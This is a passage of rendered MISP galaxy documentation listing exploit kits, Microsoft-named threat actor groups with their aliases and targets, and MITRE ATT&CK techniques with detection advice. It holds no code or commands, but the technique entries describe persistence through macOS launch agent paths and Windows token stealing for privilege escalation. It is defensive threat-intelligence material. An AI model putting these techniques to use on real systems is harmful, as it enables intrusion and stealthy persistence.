<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malware.dontneedcoffee.com/2012/12/juice-sweet-orange-2012-12.html">http://malware.dontneedcoffee.com/2012/12/juice-sweet-orange-2012-12.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_styx"><a class="anchor" href="#_styx"></a><a class="link" href="#_styx">Styx</a></h3>
<div class="paragraph">
<p>Styx Exploit Kit</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 541. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malware.dontneedcoffee.com/2012/12/crossing-styx-styx-sploit-pack-20-cve.html">http://malware.dontneedcoffee.com/2012/12/crossing-styx-styx-sploit-pack-20-cve.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://krebsonsecurity.com/2013/07/styx-exploit-pack-domo-arigato-pc-roboto/">https://krebsonsecurity.com/2013/07/styx-exploit-pack-domo-arigato-pc-roboto/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malware.dontneedcoffee.com/2013/05/inside-styx-2013-05.html">http://malware.dontneedcoffee.com/2013/05/inside-styx-2013-05.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_whitehole"><a class="anchor" href="#_whitehole"></a><a class="link" href="#_whitehole">WhiteHole</a></h3>
<div class="paragraph">
<p>WhiteHole Exploit Kit appeared in January 2013 in the tail of the CVE-2013-0422</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 542. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malware.dontneedcoffee.com/2013/02/briefly-wave-whitehole-exploit-kit-hello.html">http://malware.dontneedcoffee.com/2013/02/briefly-wave-whitehole-exploit-kit-hello.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_unknown_2"><a class="anchor" href="#_unknown_2"></a><a class="link" href="#_unknown_2">Unknown</a></h3>
<div class="paragraph">
<p>Unknown Exploit Kit. This is a place holder for any undocumented Exploit Kit. If you use this tag, we will be more than happy to give the associated EK a deep look.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 543. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/kafeine">https://twitter.com/kafeine</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/node5">https://twitter.com/node5</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/kahusecurity">https://twitter.com/kahusecurity</a></p></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_microsoft_activity_group_actor"><a class="anchor" href="#_microsoft_activity_group_actor"></a><a class="link" href="#_microsoft_activity_group_actor">Microsoft Activity Group actor</a></h2>
<div class="sectionbody">
<div class="paragraph">
<p>Activity groups as described by Microsoft.</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<i class="fa icon-note" title="Note"></i>
</td>
<td class="content">
Microsoft Activity Group actor is a cluster galaxy available in JSON format at <a href="https://github.com/MISP/misp-galaxy/blob/master/clusters/microsoft" class="bare">https://github.com/MISP/misp-galaxy/blob/master/clusters/microsoft</a> activity group actor.json[<strong>this location</strong>] The JSON format can be freely reused in your application or automatically enabled in <a href="https://www.github.com/MISP/MISP">MISP</a>.
</td>
</tr>
</table>
</div>
<div class="dlist">
<dl>
<dt class="hdlist1">authors</dt>
<dd>
<p>Various</p>
</dd>
</dl>
</div>
<div class="sect2">
<h3 id="_promethium"><a class="anchor" href="#_promethium"></a><a class="link" href="#_promethium">PROMETHIUM</a></h3>
<div class="paragraph">
<p>PROMETHIUM is an activity group that has been active as early as 2012. The group primarily uses Truvasys, a first-stage malware that has been in circulation for several years. Truvasys has been involved in several attack campaigns, where it has masqueraded as one of server common computer utilities, including WinUtils, TrueCrypt, WinRAR, or SanDisk. In each of the campaigns, Truvasys malware evolved with additional features—this shows a close relationship between the activity groups behind the campaigns and the developers of the malware.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 544. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/">https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_neodymium"><a class="anchor" href="#_neodymium"></a><a class="link" href="#_neodymium">NEODYMIUM</a></h3>
<div class="paragraph">
<p>NEODYMIUM is an activity group that is known to use a backdoor malware detected by Microsoft as Wingbird. This backdoors characteristics closely match FinFisher, a government-grade commercial surveillance package. Data about Wingbird activity indicate that it is typically used to attack individual computers instead of networks.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 545. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/">https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_terbium"><a class="anchor" href="#_terbium"></a><a class="link" href="#_terbium">TERBIUM</a></h3>
<div class="paragraph">
<p>Microsoft Threat Intelligence identified similarities between this recent attack and previous 2012 attacks against tens of thousands of computers belonging to organizations in the energy sector. Microsoft Threat Intelligence refers to the activity group behind these attacks as TERBIUM, following our internal practice of assigning rogue actors chemical element names.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 546. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.technet.microsoft.com/mmpc/2016/12/09/windows-10-protection-detection-and-response-against-recent-attacks/">https://blogs.technet.microsoft.com/mmpc/2016/12/09/windows-10-protection-detection-and-response-against-recent-attacks/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_strontium"><a class="anchor" href="#_strontium"></a><a class="link" href="#_strontium">STRONTIUM</a></h3>
<div class="paragraph">
<p>STRONTIUM has been active since at least 2007. Whereas most modern untargeted malware is ultimately profit-oriented, STRONTIUM mainly seeks sensitive information. Its primary institutional targets have included government bodies, diplomatic institutions, and military forces and installations in NATO member states and certain Eastern European countries. Additional targets have included journalists, political advisors, and organizations associated with political activism in central Asia. STRONTIUM is an activity group that usually targets government agencies, diplomatic institutions, and military organizations, as well as affiliated private sector organizations such as defense contractors and public policy research institutes. Microsoft has attributed more 0-day exploits to STRONTIUM than any other tracked group in 2016. STRONTIUM frequently uses compromised e-mail accounts from one victim to send malicious e-mails to a second victim and will persistently pursue specific targets for months until they are successful in compromising the victims computer.</p>
</div>
<div class="paragraph">
<p>STRONTIUM is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT 28</p>
</li>
<li>
<p>APT28</p>
</li>
<li>
<p>Pawn Storm</p>
</li>
<li>
<p>Fancy Bear</p>
</li>
<li>
<p>Sednit</p>
</li>
<li>
<p>TsarTeam</p>
</li>
<li>
<p>TG-4127</p>
</li>
<li>
<p>Group-4127</p>
</li>
<li>
<p>Sofacy</p>
</li>
<li>
<p>Grey-Cloud</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 547. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.technet.microsoft.com/mmpc/2016/11/01/our-commitment-to-our-customers-security/">https://blogs.technet.microsoft.com/mmpc/2016/11/01/our-commitment-to-our-customers-security/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_A_Profile_Of_A_Persistent_Adversary_English.pdf">http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_A_Profile_Of_A_Persistent_Adversary_English.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.technet.microsoft.com/mmpc/2015/11/16/microsoft-security-intelligence-report-strontium/">https://blogs.technet.microsoft.com/mmpc/2015/11/16/microsoft-security-intelligence-report-strontium/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dubnium"><a class="anchor" href="#_dubnium"></a><a class="link" href="#_dubnium">DUBNIUM</a></h3>
<div class="paragraph">
<p>DUBNIUM (which shares indicators with what Kaspersky researchers have called DarkHotel) is one of the activity groups that has been very active in recent years, and has many distinctive features.</p>
</div>
<div class="paragraph">
<p>DUBNIUM is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>darkhotel</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 548. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/">https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2">https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.technet.microsoft.com/mmpc/2016/06/20/reverse-engineering-dubniums-flash-targeting-exploit/">https://blogs.technet.microsoft.com/mmpc/2016/06/20/reverse-engineering-dubniums-flash-targeting-exploit/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.technet.microsoft.com/mmpc/2016/07/14/reverse-engineering-dubnium-stage-2-payload-analysis/">https://blogs.technet.microsoft.com/mmpc/2016/07/14/reverse-engineering-dubnium-stage-2-payload-analysis/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_platinum"><a class="anchor" href="#_platinum"></a><a class="link" href="#_platinum">PLATINUM</a></h3>
<div class="paragraph">
<p>PLATINUM has been targeting its victims since at least as early as 2009, and may have been active for several years prior. Its activities are distinctly different not only from those typically seen in untargeted attacks, but from many targeted attacks as well. A large share of targeted attacks can be characterized as opportunistic: the activity group changes its target profiles and attack geographies based on geopolitical seasons, and may attack institutions all over the world. Like many such groups, PLATINUM seeks to steal sensitive intellectual property related to government interests, but its range of preferred targets is consistently limited to specific governmental organizations, defense institutes, intelligence agencies, diplomatic institutions, and telecommunication providers in South and Southeast Asia. The groups persistent use of spear phishing tactics (phishing attempts aimed at specific individuals) and access to previously undiscovered zero-day exploits have made it a highly resilient threat.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 549. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.technet.microsoft.com/mmpc/2016/04/26/digging-deep-for-platinum/">https://blogs.technet.microsoft.com/mmpc/2016/04/26/digging-deep-for-platinum/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf">http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_barium"><a class="anchor" href="#_barium"></a><a class="link" href="#_barium">BARIUM</a></h3>
<div class="paragraph">
<p>Microsoft Threat Intelligence associates Winnti with multiple activity groups—collections of malware, supporting infrastructure, online personas, victimology, and other attack artifacts that the Microsoft intelligent security graph uses to categorize and attribute threat activity. Microsoft labels activity groups using code names derived from elements in the periodic table. In the case of this malware, the activity groups strongly associated with Winnti are BARIUM and LEAD. But even though they share the use of Winnti, the BARIUM and LEAD activity groups are involved in very different intrusion scenarios. BARIUM begins its attacks by cultivating relationships with potential victims—particularly those working in Business Development or Human Resources—on various social media platforms. Once BARIUM has established rapport, they spear-phish the victim using a variety of unsophisticated malware installation vectors, including malicious shortcut (.lnk) files with hidden payloads, compiled HTML help (.chm) files, or Microsoft Office documents containing macros or exploits. Initial intrusion stages feature the Win32/Barlaiy implant—notable for its use of social network profiles, collaborative document editing sites, and blogs for C&amp;C. Later stages of the intrusions rely upon Winnti for persistent access. The majority of victims recorded to date have been in electronic gaming, multimedia, and Internet content industries, although occasional intrusions against technology companies have occurred.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 550. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/">https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lead"><a class="anchor" href="#_lead"></a><a class="link" href="#_lead">LEAD</a></h3>
<div class="paragraph">
<p>In contrast, LEAD has established a far greater reputation for industrial espionage. In the past few years, LEADs victims have included: Multinational, multi-industry companies involved in the manufacture of textiles, chemicals, and electronics Pharmaceutical companies A company in the chemical industry University faculty specializing in aeronautical engineering and research A company involved in the design and manufacture of motor vehicles A cybersecurity company focusing on protecting industrial control systems During these intrusions, LEADs objective was to steal sensitive data, including research materials, process documents, and project plans. LEAD also steals code-signing certificates to sign its malware in subsequent attacks. In most cases, LEADs attacks do not feature any advanced exploit techniques. The group also does not make special effort to cultivate victims prior to an attack. Instead, the group often simply emails a Winnti installer to potential victims, relying on basic social engineering tactics to convince recipients to run the attached malware. In some other cases, LEAD gains access to a target by brute-forcing remote access login credentials, performing SQL injection, or exploiting unpatched web servers, and then they copy the Winnti installer directly to compromised machines.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 551. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/">https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_zirconium"><a class="anchor" href="#_zirconium"></a><a class="link" href="#_zirconium">ZIRCONIUM</a></h3>
<div class="paragraph">
<p>In addition to strengthening generic detection of EoP exploits, Microsoft security researchers are actively gathering threat intelligence and indicators attributable to ZIRCONIUM, the activity group using the CVE-2017-0005 exploit.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 552. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.technet.microsoft.com/mmpc/2017/03/27/detecting-and-mitigating-elevation-of-privilege-exploit-for-cve-2017-0005/">https://blogs.technet.microsoft.com/mmpc/2017/03/27/detecting-and-mitigating-elevation-of-privilege-exploit-for-cve-2017-0005/</a></p></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_attack_pattern"><a class="anchor" href="#_attack_pattern"></a><a class="link" href="#_attack_pattern">Attack Pattern</a></h2>
<div class="sectionbody">
<div class="paragraph">
<p>ATT&amp;CK tactic.</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<i class="fa icon-note" title="Note"></i>
</td>
<td class="content">
Attack Pattern is a cluster galaxy available in JSON format at <a href="https://github.com/MISP/misp-galaxy/blob/master/clusters/attack" class="bare">https://github.com/MISP/misp-galaxy/blob/master/clusters/attack</a> pattern.json[<strong>this location</strong>] The JSON format can be freely reused in your application or automatically enabled in <a href="https://www.github.com/MISP/MISP">MISP</a>.
</td>
</tr>
</table>
</div>
<div class="dlist">
<dl>
<dt class="hdlist1">authors</dt>
<dd>
<p>MITRE</p>
</dd>
</dl>
</div>
<div class="sect2">
<h3 id="_exfiltration_over_alternative_protocol"><a class="anchor" href="#_exfiltration_over_alternative_protocol"></a><a class="link" href="#_exfiltration_over_alternative_protocol">Exfiltration Over Alternative Protocol</a></h3>
<div class="paragraph">
<p>Data exfiltration is performed with a different protocol from the main command and control protocol or channel. The data is likely to be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, or some other network protocol. Different channels could include Internet Web services such as cloud storage.</p>
</div>
<div class="paragraph">
<p>Detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.[[Citation: University of Birmingham C2]]</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Linux, Windows 10, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: User interface, Process monitoring, Process use of network, Packet capture, Netflow/Enclave netflow, Network protocol analysis</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 553. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1048">https://attack.mitre.org/wiki/Technique/T1048</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_standard_application_layer_protocol"><a class="anchor" href="#_standard_application_layer_protocol"></a><a class="link" href="#_standard_application_layer_protocol">Standard Application Layer Protocol</a></h3>
<div class="paragraph">
<p>Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.</p>
</div>
<div class="paragraph">
<p>For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are RPC, SSH, or RDP.</p>
</div>
<div class="paragraph">
<p>Detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.[[Citation: University of Birmingham C2]]</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Linux, Windows 10, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Packet capture, Netflow/Enclave netflow, Process use of network, Malware reverse engineering, Process monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 554. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1071">https://attack.mitre.org/wiki/Technique/T1071</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_launch_agent"><a class="anchor" href="#_launch_agent"></a><a class="link" href="#_launch_agent">Launch Agent</a></h3>
<div class="paragraph">
<p>Per Apples developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (plist) files found in &lt;code&gt;/System/Library/LaunchAgents&lt;/code&gt;, &lt;code&gt;/Library/LaunchAgents&lt;/code&gt;, and &lt;code&gt;$HOME/Library/LaunchAgents&lt;/code&gt;[[Citation: AppleDocs Launch Agent Daemons]][[Citation: OSX Keydnap malware]][[Citation: Antiquated Mac Malware]]. These launch agents have property list files which point to the executables that will be launched[[Citation: OSX.Dok Malware]].</p>
</div>
<div class="paragraph">
<p>Adversaries may install a new launch agent that can be configured to execute at login by using launchd or launchctl to load a plist into the appropriate directories [[Citation: Sofacy Komplex Trojan]] [[Citation: Methods of Mac Malware Persistence]]. The agent name may be disguised by using a name from a related operating system or benign software. Launch Agents are created with user level privileges and are executed with the privileges of the user when they log in[[Citation: OSX Malware Detection]][[Citation: OceanLotus for OS X]]. They can be set up to execute when a specific user logs in (in the specific users directory structure) or when any user logs in (which requires administrator privileges).</p>
</div>
<div class="paragraph">
<p>Detection: Monitor Launch Agent creation through additional plist files and utilities such as Objective-Sees KnockKnock application. Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.</p>
</div>
<div class="paragraph">
<p>Platforms: MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process Monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 555. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1159">https://attack.mitre.org/wiki/Technique/T1159</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/">https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/">https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html">https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/">https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf">https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/">https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update">https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.synack.com/wp-content/uploads/2016/03/RSA%20OSX%20Malware.pdf">https://www.synack.com/wp-content/uploads/2016/03/RSA%20OSX%20Malware.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_communication_through_removable_media"><a class="anchor" href="#_communication_through_removable_media"></a><a class="link" href="#_communication_through_removable_media">Communication Through Removable Media</a></h3>
<div class="paragraph">
<p>Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system. Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by Replication Through Removable Media. Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor file access on removable media. Detect processes that execute when removable media is mounted.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Linux, Windows 10, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Data loss prevention</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 556. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1092">https://attack.mitre.org/wiki/Technique/T1092</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_access_token_manipulation"><a class="anchor" href="#_access_token_manipulation"></a><a class="link" href="#_access_token_manipulation">Access Token Manipulation</a></h3>
<div class="paragraph">
<p>Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token. For example, Microsoft promotes the use of access tokens as a security best practice. Administrators should log in as a standard user but run their tools with administrator privileges using the built-in access token manipulation command &lt;code&gt;runas&lt;/code&gt;. [[Citation: Microsoft runas]]</p>
</div>
<div class="paragraph">
<p>Adversaries may use access tokens to operate under a different user or system security context to perform actions and evade detection. An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level.[[Citation: Pentestlab Token Manipulation]]</p>
</div>
<div class="paragraph">
<p>Adversaries can also create spoofed access tokens if they know the credentials of a user. Any standard user can use the &lt;code&gt;runas&lt;/code&gt; command, and the Windows API functions, to do this; it does not require access to an administrator account.</p>
</div>
<div class="paragraph">
<p>Lastly, an adversary can use a spoofed token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.</p>
</div>
<div class="paragraph">
<p>Metasploits Meterpreter payload allows arbitrary token stealing and uses token stealing to escalate privileges. [[Citation: Metasploit access token]] The Cobalt Strike beacon payload allows arbitrary token stealing and can also create tokens. [[Citation: Cobalt Strike Access Token]]</p>
</div>
<div class="paragraph">
<p>Detection: If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the &lt;code&gt;runas&lt;/code&gt; command. Detailed command-line logging is not enabled by default in Windows.[[Citation: Microsoft Command-line Logging]]</p>
</div>
<div class="paragraph">
